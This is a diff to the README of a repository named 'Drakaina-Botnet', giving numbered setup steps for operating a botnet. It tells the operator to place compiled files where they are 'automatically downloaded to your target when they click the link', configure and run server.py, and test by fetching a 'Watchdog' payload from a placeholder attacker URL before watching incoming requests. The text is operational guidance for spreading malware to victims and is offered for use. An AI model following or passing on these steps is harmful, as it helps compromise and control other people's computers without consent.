h0lyl337/Drakaina-Botnet/README.md

 4) place both compiled files in the Windows folder you created ealiar, these files will be automatically downloaded to your target when they click the link.

+5) open server_config.cfg and change the server and port to what you want the server to run on.

-5) run server.py using " python server.py " or " python3 server.py " from the commandline.
+6) run server.py using " python server.py " or " python3 server.py " from the commandline.

-6) test by downloading the Watchdog file from the link "http://<yourip>:<port>/downloads/windows/watchdog"
+7) test by downloading the Watchdog file from the link "http://<yourip>:<port>/downloads/windows/watchdog"

-7) you should see requests comming in to your server...enjoy
+8) you should see requests comming in to your server...enjoy